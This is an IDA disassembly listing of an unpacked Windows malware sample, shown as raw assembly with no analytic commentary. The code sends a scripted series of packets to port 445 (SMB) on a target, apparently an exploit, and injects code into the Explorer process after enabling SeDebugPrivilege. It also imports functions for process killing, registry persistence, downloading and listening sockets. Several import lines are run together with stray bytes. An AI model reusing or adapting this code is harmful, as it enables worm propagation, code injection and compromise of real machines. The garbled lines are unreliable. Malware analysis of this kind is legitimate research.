;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9F101B6888EC699376AF95C0F990C822
; File Name : u:\work\9f101b6888ec699376af95c0f990c822_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31501004 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31501008 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_3150100C dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_315028AE+FD�r
dword_31501010 dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31501014 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31501018 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_3150101C dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKeydword_31501020 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31501024 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31501028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3150102C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_315023E4+1D�r
dword_31501030 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31501034 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_315023E4+4E�r ...
dword_31501038 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA align 10h
dword_31501040 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_31503722:loc_31503968�r ...
dword_31501048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_315029C7+14B�r
dword_3150104C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_31503608+ED�r
dword_31501050 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31503371+A�r
dword_31501054 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_31501058 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3150105C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31501060 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31501064 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31501068 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_315029C7+3F�r ...
dword_3150106C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; UPX0:31503448�r ...
dword_31501070 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31501074 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31501078 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3150107C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31501080 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31501084 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31501088 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_315026C2+8F�r ...
dword_3150108C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31502BE8+98�r
dword_31501090 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31502BE8+C2�r
dword_31501094 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_315025F6+F�r
dword_31501098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_315028AE:loc_31502980�r ...
dword_3150109C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_315025F6+C3�r
dword_315010A0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_315011C0+272�r ...
dword_315010A4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31501A62+E2�r ...
dword_315010A8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_315029C7+69�r ...
dword_315010AC dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_315010B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_315017AF+2C�r
dword_315010B4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31501D96+EC�r
dword_315010B8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_315010BC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31501911+19�r ...
dword_315010C0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31502490+92�r
dword_315010C4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31501D1A�r
dword_315010C8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_315031EC+13�r ...
dword_315010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_315010D0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31501911+12�r ...
dword_315010D4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_315010D8 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31502B4C+1B�r
dword_315010DC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_315010E0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31501BA8+66�r ...
dword_315010E4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_31502128+3F�r ...
dword_315010E8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_315010EC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_315010F0 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_315029C7+83�r ...
align 8
dword_315010F8 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_315010FC dd 77C4CBE0h ; resolved to->MSVCRT.atandword_31501100 dd 77C4D444h ; resolved to->MSVCRT.sindword_31501104 dd 77C4CD34h ; resolved to->MSVCRT.cosdword_31501108 dd 77C22738h, 77C227FAh; resolved to->MSVCRT._EH_prolog ; UPX0:loc_31503A92�r
dword_31501110 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31503722+B9�r
dword_31501114 dd 77C46030h ; resolved to->MSVCRT.strcpydword_31501118 dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A80�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31502490+79�r ...
dword_31501124 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31501BA8:loc_31501C76�r ...
dword_31501128 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31503371+5D�r
dword_3150112C dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31501130 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31501134 dd 77C475F0h ; resolved to->MSVCRT.memset dd 0
dword_3150113C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31501A62+8B�r ...
dword_31501140 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31501144 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31501148 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId align 10h
dword_31501150 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31501154 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31501158 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_3150115C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31502307�r
dd 0
dword_31501164 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31501168 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3150116C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31501170 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31501F6B+7A�r ...
dword_31501174 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31501F6B+93�r ...
dword_31501178 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31501F6B+B5�r ...
dword_3150117C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31501180 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31501184 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_31501188 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_315019F3+25�r
dword_3150118C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31501BA8+AC�r ...
dword_31501190 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31502277+D�r
dword_31501194 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31501BA8+F0�r ...
dword_31501198 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31502DEC+46�r
dword_3150119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31501A62+67�r ...
dword_315011A0 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31501A62+128�r
dword_315011A8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31501A62+12F�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_315020C4+36�p
; sub_31502128+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A50
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A44 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A3E ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A44 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A38 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A38 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; dword_315010A4
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A38 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A44 ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A44 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A44 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A44 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A38 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A38 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A38 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A44 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A44 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_3150119C
push edi
call esi ; dword_315010A4
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D5A�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_315010B0
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_315010B0
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_315010B0
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D6E�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506190
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_315010B0
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_315010B0
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506164
call esi ; dword_315010BC
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; dword_315010BC
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; dword_315010BC
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501BA8+B�p
; UPX0:31501D30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D3A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D96+145�p
; sub_31501D96+150�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501BA8+12C�p
; sub_31501D96+12B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F6B+26�p
; sub_315025F6+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029C7+16B�p
; sub_31503608+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A38 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; dword_315010BC
push [ebp+var_10]
call esi ; dword_315010BC
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DEC+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_315021B0+3E�p
; sub_31502277+7�p
